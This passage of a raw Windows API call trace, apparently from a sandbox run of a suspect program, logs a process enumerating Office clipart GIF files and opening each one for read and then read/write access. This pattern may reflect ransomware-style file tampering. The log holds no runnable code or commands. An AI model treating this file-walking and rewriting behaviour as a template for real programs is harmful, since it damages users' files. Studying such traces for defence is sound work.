ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x135b)) returned 1 [0100.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0100.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0100.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.795] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13a6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00158_.GIF", cAlternateFileName="")) returned 1 [0100.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0100.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0100.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0100.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0100.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0100.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0100.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.804] AreFileApisANSI () returned 1 [0100.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0100.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.804] AreFileApisANSI () returned 1 [0100.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ac50 [0100.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 69 [0100.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.805] GetFileType (hFile=0x33c) returned 0x1 [0100.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0100.805] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.805] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.805] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.806] CloseHandle (hObject=0x33c) returned 1 [0100.806] AreFileApisANSI () returned 1 [0100.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0100.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 69 [0100.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.806] GetFileType (hFile=0x33c) returned 0x1 [0100.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0100.806] CloseHandle (hObject=0x33c) returned 1 [0100.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.807] AreFileApisANSI () returned 1 [0100.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0100.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 69 [0100.808] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13a6)) returned 1 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0100.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.808] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00160_.GIF", cAlternateFileName="")) returned 1 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0100.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0100.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0100.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0100.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.809] AreFileApisANSI () returned 1 [0100.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0100.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.809] AreFileApisANSI () returned 1 [0100.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0100.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 69 [0100.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.809] GetFileType (hFile=0x33c) returned 0x1 [0100.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.810] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.810] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.810] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.810] CloseHandle (hObject=0x33c) returned 1 [0100.810] AreFileApisANSI () returned 1 [0100.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0100.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 69 [0100.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.810] GetFileType (hFile=0x33c) returned 0x1 [0100.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0100.811] CloseHandle (hObject=0x33c) returned 1 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 